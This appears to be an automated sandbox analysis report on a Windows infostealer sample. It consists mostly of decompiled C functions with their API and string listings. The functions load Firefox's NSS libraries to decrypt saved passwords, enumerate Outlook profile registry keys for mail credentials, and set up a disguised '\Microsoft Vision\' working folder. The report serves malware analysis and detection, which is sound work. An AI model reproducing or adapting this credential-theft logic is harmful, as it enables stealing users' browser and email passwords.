                                                                      • Part of subcall function 00406730: GetCommandLineA.KERNEL32(004068C0,?), ref: 00406730
                                                                      • Part of subcall function 00406730: CoInitialize.OLE32(00000000), ref: 00406738
                                                                    • IsWindowVisible.USER32(?), ref: 0040693D
                                                                    • ShowWindow.USER32(?,00000001), ref: 00406951
                                                                    • GetDlgItem.USER32(?,000000D0), ref: 0040696A
                                                                    • SendMessageA.USER32(00000000,00000180,00000000,?), ref: 00406978
                                                                    • GetDlgItem.USER32(?,000000D1), ref: 0040699C
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069A7
                                                                    • GetDlgItem.USER32(?,000000D3), ref: 004069B6
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069BB
                                                                    • GetDlgItem.USER32(?,000000D2), ref: 004069CA
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069CF
                                                                    • GetDlgItem.USER32(?,000000D4), ref: 004069DE
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069E3
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004069EF
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004069F4
                                                                      • Part of subcall function 00403AE0: GetLastError.KERNEL32(0040136F,0041FB28,0040136F,?,0040136F,80070216,00000000), ref: 00403B00
                                                                    • GetDlgItem.USER32(?,000000D0), ref: 00406A74
                                                                    • SendMessageA.USER32(00000000,0000018F,000000FF,?), ref: 00406A8E
                                                                    • SendMessageA.USER32(00000000,00000189,00000000,?), ref: 00406AA6
                                                                    • SendMessageA.USER32(00000000,00000182,00000000,00000000), ref: 00406AB1
                                                                      • Part of subcall function 00406DE0: GetDlgItem.USER32(?,000000D0), ref: 00406E00
                                                                      • Part of subcall function 00406DE0: 73CCAC50.USER32(00000000), ref: 00406E11
                                                                      • Part of subcall function 00406DE0: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00406E39
                                                                      • Part of subcall function 00406DE0: SendMessageA.USER32(00000000,00000194,?,00000000), ref: 00406EE1
                                                                    • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00406ACE
                                                                    • GetDlgItem.USER32(?,000000D1), ref: 00406AF0
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406AFB
                                                                    • GetDlgItem.USER32(?,000000D3), ref: 00406B0A
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406B0F
                                                                    • GetDlgItem.USER32(?,000000D2), ref: 00406B1E
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406B23
                                                                    • GetDlgItem.USER32(?,000000D4), ref: 00406B32
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406B37
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00406B43
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00406B48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Enable$MessageSend$CommandErrorExtentInitializeLastLinePoint32ShowTextVisible
                                                                    • String ID: Cookie %9d.$Cookie %9d.(pUnk = %p)
                                                                    • API String ID: 3625087784-2754364986
                                                                    • Opcode ID: d5f630e425a98e50dfa06e2096088c813359cdf5ba056af25791d08efade4967
                                                                    • Instruction ID: 6ede75db96ccff61ba40a2ed4a33d96549853e1cc4968c3f54cc6da287572702
                                                                    • Opcode Fuzzy Hash: d5f630e425a98e50dfa06e2096088c813359cdf5ba056af25791d08efade4967
                                                                    • Instruction Fuzzy Hash: F1718371640208BBEB10ABB5DC46FDA7BADEF04744F05402AFA05BB1E1CBB5E9149F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1B67E Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E02D1B67E(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E02D11052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E02D1346A( &_a4, _t206, 0, "\\");
				E02D1362D( &_v40,  &_a4);
				E02D1346A( &_v40, _t206, 0, L"nss3.dll");
				E02D1362D( &_v20,  &_a4);
				E02D1346A( &_v20, _t206, 0, L"msvcr120.dll");
				E02D1362D( &_v16,  &_a4);
				E02D1346A( &_v16, _t206, 0, L"msvcp120.dll");
				E02D1362D( &_v36,  &_a4);
				E02D1346A( &_v36, _t206, 0, L"mozglue.dll");
				E02D1362D( &_v32,  &_a4);
				E02D1346A( &_v32, _t206, 0, L"softokn3.dll");
				E02D1362D( &_v28,  &_a4);
				E02D1346A( &_v28, _t206, 0, L"msvcp");
				E02D1362D( &_v24,  &_a4);
				E02D1346A( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E02D1362D( &_v8,  &_v28);
					E02D1346A(E02D13272( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E02D15EA5(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E02D1362D( &_v8,  &_v24);
							E02D1346A(E02D13272( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E02D15EA5(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb8) = _t135;
							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E02D20969(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x88)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							E02D15EA5(_v24);
							E02D15EA5(_v28);
							E02D15EA5(_v32);
							E02D15EA5(_v36);
							E02D15EA5(_v16);
							E02D15EA5(_v20);
							E02D15EA5(_v40);
							E02D15EA5(_a4);
							return _t158;
						}
						E02D13437( &_v20,  &_v8);
						E02D15EA5(_v8);
						goto L9;
					}
				}
				E02D13437( &_v16,  &_v8);
				E02D15EA5(_v8);
				goto L5;
			}



















                                                                    0x02d1b67e
                                                                    0x02d1b696
                                                                    0x02d1b698
                                                                    0x02d1b69c
                                                                    0x02d1b6ac
                                                                    0x02d1b6b5
                                                                    0x02d1b6c3
                                                                    0x02d1b6cf
                                                                    0x02d1b6dc
                                                                    0x02d1b6e8
                                                                    0x02d1b6f5
                                                                    0x02d1b701
                                                                    0x02d1b70e
                                                                    0x02d1b71a
                                                                    0x02d1b727
                                                                    0x02d1b733
                                                                    0x02d1b740
                                                                    0x02d1b74c
                                                                    0x02d1b759
                                                                    0x02d1b765
                                                                    0x02d1b772
                                                                    0x02d1b779
                                                                    0x02d1b77a
                                                                    0x02d1b77d
                                                                    0x02d1b784
                                                                    0x02d1b79b
                                                                    0x02d1b7ab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1b7b0
                                                                    0x02d1b7b4
                                                                    0x02d1b7b9
                                                                    0x02d1b7c0
                                                                    0x02d1b7c3
                                                                    0x00000000
                                                                    0x02d1b7c5
                                                                    0x02d1b7db
                                                                    0x02d1b7db
                                                                    0x02d1b7e2
                                                                    0x02d1b7f7
                                                                    0x02d1b807
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1b80c
                                                                    0x02d1b80f
                                                                    0x02d1b814
                                                                    0x02d1b81d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1b835
                                                                    0x02d1b843
                                                                    0x02d1b84e
                                                                    0x02d1b859
                                                                    0x02d1b864
                                                                    0x02d1b86a
                                                                    0x02d1b86c
                                                                    0x02d1b878
                                                                    0x02d1b88a
                                                                    0x02d1b892
                                                                    0x02d1b898
                                                                    0x02d1b89a
                                                                    0x02d1b8a0
                                                                    0x02d1b8b6
                                                                    0x02d1b8c9
                                                                    0x02d1b8df
                                                                    0x02d1b8f2
                                                                    0x02d1b905
                                                                    0x02d1b918
                                                                    0x02d1b92b
                                                                    0x02d1b93e
                                                                    0x02d1b949
                                                                    0x02d1b957
                                                                    0x02d1b95f
                                                                    0x02d1b95f
                                                                    0x02d1b89a
                                                                    0x02d1b892
                                                                    0x02d1b963
                                                                    0x02d1b96b
                                                                    0x02d1b973
                                                                    0x02d1b97b
                                                                    0x02d1b983
                                                                    0x02d1b98b
                                                                    0x02d1b993
                                                                    0x02d1b99b
                                                                    0x02d1b9a6
                                                                    0x02d1b9a6
                                                                    0x02d1b828
                                                                    0x02d1b830
                                                                    0x00000000
                                                                    0x02d1b830
                                                                    0x02d1b7c3
                                                                    0x02d1b7ce
                                                                    0x02d1b7d6
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 02D1B6AC
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B6B5
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D13272: wsprintfW.USER32 ref: 02D1328D
                                                                    • PathFileExistsW.SHLWAPI(02D1A760,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 02D1B7A3
                                                                    • PathFileExistsW.SHLWAPI(02D1A760,.dll,?,02D1A760,?,00000104,00000000), ref: 02D1B7FF
                                                                    • LoadLibraryW.KERNEL32(?,02D1A760,?,00000104,00000000), ref: 02D1B83E
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B849
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B854
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B85F
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B86A
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B957
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                                    • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                                    • API String ID: 410702425-850564384
                                                                    • Opcode ID: ba5e86e14989914294350643a68110d7e95cdbadbf521a06791a910e980db6a8
                                                                    • Instruction ID: 8a394435c17d4d84aba7d4087eaa732b6daff40791fa18ff0fd0bbd596dcec68
                                                                    • Opcode Fuzzy Hash: ba5e86e14989914294350643a68110d7e95cdbadbf521a06791a910e980db6a8
                                                                    • Instruction Fuzzy Hash: 839107B1A00219FBDB18EFA1E8819EEB77AFF64304F50416AD51667750DB346E18CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D195AA Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214windowstringregistryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 83%
                                                                    			E02D195AA(void* __ecx, void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				char _v724;
				struct tagMSG _v748;
				struct _WNDCLASSW _v788;
				struct _SYSTEMTIME _v804;
				char _v808;
				void* _v812;
				long _v816;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				struct HWND__* _t69;
				int _t73;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t107;
				void* _t110;
				struct HINSTANCE__* _t111;
				struct HWND__* _t112;
				void* _t114;
				signed int _t119;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t129;
				intOrPtr _t131;
				void* _t132;
				void* _t133;
				void* _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				void* _t150;

				_t114 = __ecx;
				_t111 = GetModuleHandleA(0);
				_v788.hIcon = 0;
				_v804.wSecond = 0;
				asm("xorps xmm0, xmm0");
				asm("stosd");
				asm("movlpd [esp+0x30], xmm0");
				asm("movlpd [esp+0x3c], xmm0");
				asm("stosd");
				asm("movlpd [esp+0x44], xmm0");
				asm("stosd");
				asm("stosd");
				_t46 =  *0x2d296a0; // 0x0
				E02D11052(_t46 + 0x210, 0, 0x800);
				_t49 =  *0x2d296a0; // 0x0
				E02D11052(_t49 + 0x10, 0, 0x208);
				_t52 =  *0x2d296a0; // 0x0
				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
				_t54 =  *0x2d296a0; // 0x0
				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
				_t57 =  *0x2d296a0; // 0x0
				CreateDirectoryW(_t57 + 0x10, 0);
				_t60 =  *0x2d296a0; // 0x0
				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
					E02D11052( &_v544, 0, 0x208);
					_t99 =  *0x2d296a0; // 0x0
					_t150 = _t150 + 0xc;
					lstrcpyW( &_v544, _t99 + 0x10);
					lstrcatW( &_v544, "*");
					E02D135E5(_t150,  &_v544);
					_t107 = E02D1FF27( &_v724, _t153, _t114);
					_t129 =  *0x2d296a0; // 0x0
					E02D11BED(_t129 + 0xa18, _t153, _t107);
					_t131 = _v748.pt;
					_t154 = _t131;
					if(_t131 != 0) {
						E02D11AD5(_t131, _t131);
					}
				}
				_t132 = 4;
				_t143 = E02D134A7( &_v808, _t132, _t154);
				E02D13335(E02D1346A( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
				E02D15EA5(_v816);
				_t65 =  *0x2d296a0; // 0x0
				_v816 = 0;
				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t122 =  *0x2d296a0; // 0x0
					_t150 = _t150 + 0x20;
					_t26 = _t122 + 0x10; // 0x10
					E02D1346A(E02D1346A(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
					_t94 =  *0x2d296a0; // 0x0
					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
					_t125 =  *0x2d296a0; // 0x0
					 *(_t125 + 4) = _t95;
					CloseHandle(_t95);
				}
				_v788.lpszClassName = _v812;
				_v788.lpfnWndProc = E02D1902E;
				_v788.hInstance = _t111;
				RegisterClassW( &_v788);
				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
				_t119 = 7;
				_t112 = _t69;
				memset( &_v748, 0, _t119 << 2);
				_t73 = GetMessageA( &_v748, _t112, 0, 0);
				if(_t73 == 0) {
					L9:
					_t144 = _v748.wParam;
					goto L10;
				} else {
					_t144 = _t143 | 0xffffffff;
					while(_t73 != _t144) {
						TranslateMessage( &_v748);
						DispatchMessageA( &_v748);
						_t73 = GetMessageA( &_v748, _t112, 0, 0);
						if(_t73 != 0) {
							continue;
						}
						goto L9;
					}
					L10:
					E02D15EA5(_v812);
					return _t144;
				}
			}










































                                                                    0x02d195aa
                                                                    0x02d195c2
                                                                    0x02d195c4
                                                                    0x02d195ca
                                                                    0x02d195d2
                                                                    0x02d195d5
                                                                    0x02d195db
                                                                    0x02d195e1
                                                                    0x02d195e7
                                                                    0x02d195e8
                                                                    0x02d195ee
                                                                    0x02d195ef
                                                                    0x02d195f0
                                                                    0x02d195fe
                                                                    0x02d19603
                                                                    0x02d19615
                                                                    0x02d1961a
                                                                    0x02d1961f
                                                                    0x02d1962b
                                                                    0x02d19631
                                                                    0x02d19645
                                                                    0x02d19647
                                                                    0x02d19651
                                                                    0x02d19657
                                                                    0x02d1965c
                                                                    0x02d19662
                                                                    0x02d19672
                                                                    0x02d19677
                                                                    0x02d1967c
                                                                    0x02d1968b
                                                                    0x02d1969e
                                                                    0x02d196ab
                                                                    0x02d196b4
                                                                    0x02d196ba
                                                                    0x02d196c7
                                                                    0x02d196cc
                                                                    0x02d196d0
                                                                    0x02d196d2
                                                                    0x02d196d5
                                                                    0x02d196d5
                                                                    0x02d196d2
                                                                    0x02d196dc
                                                                    0x02d196ef
                                                                    0x02d196f9
                                                                    0x02d19702
                                                                    0x02d19707
                                                                    0x02d1970c
                                                                    0x02d19716
                                                                    0x02d19721
                                                                    0x02d19758
                                                                    0x02d1975e
                                                                    0x02d1976b
                                                                    0x02d1976f
                                                                    0x02d1977d
                                                                    0x02d19782
                                                                    0x02d1979a
                                                                    0x02d197a0
                                                                    0x02d197a7
                                                                    0x02d197aa
                                                                    0x02d197aa
                                                                    0x02d197b4
                                                                    0x02d197bd
                                                                    0x02d197c5
                                                                    0x02d197c9
                                                                    0x02d197e1
                                                                    0x02d197e9
                                                                    0x02d197ea
                                                                    0x02d197f4
                                                                    0x02d19802
                                                                    0x02d19806
                                                                    0x02d19835
                                                                    0x02d19835
                                                                    0x00000000
                                                                    0x02d19808
                                                                    0x02d19808
                                                                    0x02d1980b
                                                                    0x02d19814
                                                                    0x02d1981f
                                                                    0x02d1982f
                                                                    0x02d19833
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19833
                                                                    0x02d19839
                                                                    0x02d1983d
                                                                    0x02d1984a
                                                                    0x02d1984a

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 02D195BC
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 02D1962B
                                                                    • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 02D19645
                                                                    • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 02D19651
                                                                    • lstrcpyW.KERNEL32 ref: 02D1968B
                                                                    • lstrcatW.KERNEL32(?,02D24A58), ref: 02D1969E
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1FF27: FindFirstFileW.KERNEL32(?,?,?,?), ref: 02D1FF54
                                                                    • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 02D19721
                                                                    • wsprintfW.USER32 ref: 02D19758
                                                                    • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010,?), ref: 02D1979A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D197AA
                                                                    • RegisterClassW.USER32 ref: 02D197C9
                                                                    • CreateWindowExW.USER32 ref: 02D197E1
                                                                    • GetMessageA.USER32 ref: 02D19802
                                                                    • TranslateMessage.USER32(?), ref: 02D19814
                                                                    • DispatchMessageA.USER32 ref: 02D1981F
                                                                    • GetMessageA.USER32 ref: 02D1982F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                                                    • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                                                    • API String ID: 2678186124-2372768292
                                                                    • Opcode ID: df9af2b8aec6caa1a8b4aaefc67466a1b1fdff7eb9d8fed81ecf5545d6da1c07
                                                                    • Instruction ID: f9fcde2d5c1f18dcd0076c4a1a066044134a1d55900ebd1ec482affa68542aca
                                                                    • Opcode Fuzzy Hash: df9af2b8aec6caa1a8b4aaefc67466a1b1fdff7eb9d8fed81ecf5545d6da1c07
                                                                    • Instruction Fuzzy Hash: EE718CB2944380ABD720DBA5EC58EABB7E8FF99704F114919FA4592380DB31DD18CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1A0D8 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E02D1A0D8(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E02D11190(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E02D11052( &_v4116, 0, 0x800);
				E02D11052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E02D1A29A(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}















                                                                    0x02d1a0d8
                                                                    0x02d1a0d8
                                                                    0x02d1a0e0
                                                                    0x02d1a0ed
                                                                    0x02d1a0f1
                                                                    0x02d1a0fb
                                                                    0x02d1a10c
                                                                    0x02d1a133
                                                                    0x02d1a14e
                                                                    0x02d1a150
                                                                    0x02d1a16b
                                                                    0x02d1a16d
                                                                    0x02d1a17c
                                                                    0x02d1a189
                                                                    0x02d1a18b
                                                                    0x02d1a293
                                                                    0x02d1a293
                                                                    0x00000000
                                                                    0x02d1a293
                                                                    0x02d1a191
                                                                    0x02d1a192
                                                                    0x02d1a19f
                                                                    0x02d1a1bd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a1c6
                                                                    0x02d1a28e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a1cc
                                                                    0x02d1a1cc
                                                                    0x02d1a1ce
                                                                    0x02d1a1f0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a1f9
                                                                    0x02d1a20d
                                                                    0x02d1a21b
